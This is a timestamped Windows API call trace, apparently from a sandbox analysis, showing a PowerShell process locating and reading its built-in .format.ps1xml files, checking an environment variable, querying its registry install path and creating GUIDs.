	[0294.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0294.419] SetErrorMode (uMode=0x1) returned 0x1
	[0294.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0294.420] SetErrorMode (uMode=0x1) returned 0x1
	[0294.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0294.420] SetErrorMode (uMode=0x1) returned 0x1
	[0294.420] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0294.420] SetErrorMode (uMode=0x1) returned 0x1
	[0294.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0294.420] SetErrorMode (uMode=0x1) returned 0x1
	[0294.420] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0294.420] SetErrorMode (uMode=0x1) returned 0x1
	[0294.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0294.421] SetErrorMode (uMode=0x1) returned 0x1
	[0294.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0294.421] SetErrorMode (uMode=0x1) returned 0x1
	[0294.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0294.421] SetErrorMode (uMode=0x1) returned 0x1
	[0294.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0294.421] SetErrorMode (uMode=0x1) returned 0x1
	[0294.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0294.922] SetErrorMode (uMode=0x1) returned 0x1
	[0294.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0294.923] SetErrorMode (uMode=0x1) returned 0x1
	[0294.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0294.923] SetErrorMode (uMode=0x1) returned 0x1
	[0294.924] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d240 | out: lpFileInformation=0x12d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0294.924] SetErrorMode (uMode=0x1) returned 0x1
	[0294.927] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0294.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0294.928] CoTaskMemFree (pv=0x3a7210) 
	[0295.575] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0295.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.575] CoTaskMemFree (pv=0x3a7210) 
	[0295.577] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0295.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.577] CoTaskMemFree (pv=0x3a7210) 
	[0295.579] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0295.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.579] CoTaskMemFree (pv=0x3a7210) 
	[0295.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0295.581] SetErrorMode (uMode=0x1) returned 0x1
	[0295.581] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0295.581] GetFileType (hFile=0x330) returned 0x1
	[0295.581] SetErrorMode (uMode=0x1) returned 0x1
	[0295.581] GetFileType (hFile=0x330) returned 0x1
	[0295.581] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0295.583] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0295.584] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0295.584] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0295.584] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0295.585] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0295.585] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x9e2, lpOverlapped=0x0) returned 1
	[0295.585] ReadFile (in: hFile=0x330, lpBuffer=0x32cc802, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cc802*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0295.585] ReadFile (in: hFile=0x330, lpBuffer=0x32cd2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32cd2b8*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0295.585] CloseHandle (hObject=0x330) returned 1
	[0295.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0295.586] SetErrorMode (uMode=0x1) returned 0x1
	[0295.586] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0295.586] SetErrorMode (uMode=0x1) returned 0x1
	[0295.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0295.586] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x330) returned 0x0
	[0295.586] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0295.586] CoTaskMemAlloc (cb=0x5a) returned 0x3a4f30
	[0295.586] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3a4f30, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0295.586] CoTaskMemFree (pv=0x3a4f30) 
	[0295.587] RegCloseKey (hKey=0x330) returned 0x0
	[0295.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0295.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0295.593] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x4465a50f, Data2=0xdb01, Data3=0x435a, Data4=([0]=0xac, [1]=0x54, [2]=0xfa, [3]=0x4d, [4]=0xfe, [5]=0xa4, [6]=0xd8, [7]=0x94))) returned 0x0
	[0295.597] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x1f44b931, Data2=0x8ad3, Data3=0x46e1, Data4=([0]=0x8a, [1]=0x49, [2]=0x4d, [3]=0x72, [4]=0xd5, [5]=0x19, [6]=0x25, [7]=0x18))) returned 0x0
	[0295.607] SetErrorMode (uMode=0x1) returned 0x1
	[0295.607] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0295.607] GetFileType (hFile=0x330) returned 0x1
	[0295.607] SetErrorMode (uMode=0x1) returned 0x1
	[0295.607] GetFileType (hFile=0x330) returned 0x1
	[0296.356] ReadFile (in: hFile=0x330, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.357] ReadFile (in: hFile=0x330, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.358] ReadFile (in: hFile=0x330, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.358] ReadFile (in: hFile=0x330, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.358] ReadFile (in: hFile=0x330, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.359] ReadFile (in: hFile=0x330, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x12ced8*=0xfb2, lpOverlapped=0x0) returned 1
	[0296.359] ReadFile (in: hFile=0x330, lpBuffer=0x32f753a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f753a*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0296.359] ReadFile (in: hFile=0x330, lpBuffer=0x32f7e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x32f7e20*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0296.359] CloseHandle (hObject=0x330) returned 1
	[0296.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0296.359] SetErrorMode (uMode=0x1) returned 0x1
	[0296.359] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0296.360] SetErrorMode (uMode=0x1) returned 0x1
	[0296.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0296.360] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x330) returned 0x0
	[0296.360] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0296.360] CoTaskMemAlloc (cb=0x5a) returned 0x3a4f30
	[0296.360] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3a4f30, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0296.360] CoTaskMemFree (pv=0x3a4f30) 
	[0296.360] RegCloseKey (hKey=0x330) returned 0x0
	[0296.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0296.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0296.362] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xc68c75a2, Data2=0x6a0d, Data3=0x4d0c, Data4=([0]=0xa4, [1]=0xdc, [2]=0x35, [3]=0x88, [4]=0x42, [5]=0xe7, [6]=0x4e, [7]=0xde))) returned 0x0
	[0296.364] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xac67ae14, Data2=0x46b2, Data3=0x437d, Data4=([0]=0x87, [1]=0xb9, [2]=0xda, [3]=0x53, [4]=0x14, [5]=0x9d, [6]=0x3, [7]=0xc7))) returned 0x0
	[0296.365] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe78b62d3, Data2=0x746a, Data3=0x4092, Data4=([0]=0xb6, [1]=0xc5, [2]=0x7a, [3]=0x88, [4]=0x7c, [5]=0xdc, [6]=0x1e, [7]=0x38))) returned 0x0
	[0296.365] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x62374393, Data2=0xb87, Data3=0x4f75, Data4=([0]=0xb3, [1]=0xc7, [2]=0xd1, [3]=0x2c, [4]=0xe1, [5]=0x10, [6]=0xd4, [7]=0x25))) returned 0x0
	[0296.365] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x87c0475a, Data2=0xd43, Data3=0x452e, Data4=([0]=0x9e, [1]=0xee, [2]=0xff, [3]=0x87, [4]=0xa8, [5]=0xa3, [6]=0x2f, [7]=0x57))) returned 0x0
	[0296.365] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x1ec370e3, Data2=0x229b, Data3=0x4d55, Data4=([0]=0xbe, [1]=0x30, [2]=0xc6, [3]=0x93, [4]=0x5b, [5]=0x9d, [6]=0xba, [7]=0x52))) returned 0x0
	[0296.366] SetErrorMode (uMode=0x1) returned 0x1
	[0296.366] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0296.366] GetFileType (hFile=0x330) returned 0x1
	[0296.366] SetErrorMode (uMode=0x1) returned 0x1
	[0296.366] GetFileType (hFile=0x330) returned 0x1
	[0296.366] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.367] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.368] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.368] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.369] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.369] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0296.369] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0xaca, lpOverlapped=0x0) returned 1
	[0296.369] ReadFile (in: hFile=0x330, lpBuffer=0x33431b2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33431b2*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0296.370] ReadFile (in: hFile=0x330, lpBuffer=0x3343b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3343b80*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0296.370] CloseHandle (hObject=0x330) returned 1
	[0296.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0296.370] SetErrorMode (uMode=0x1) returned 0x1
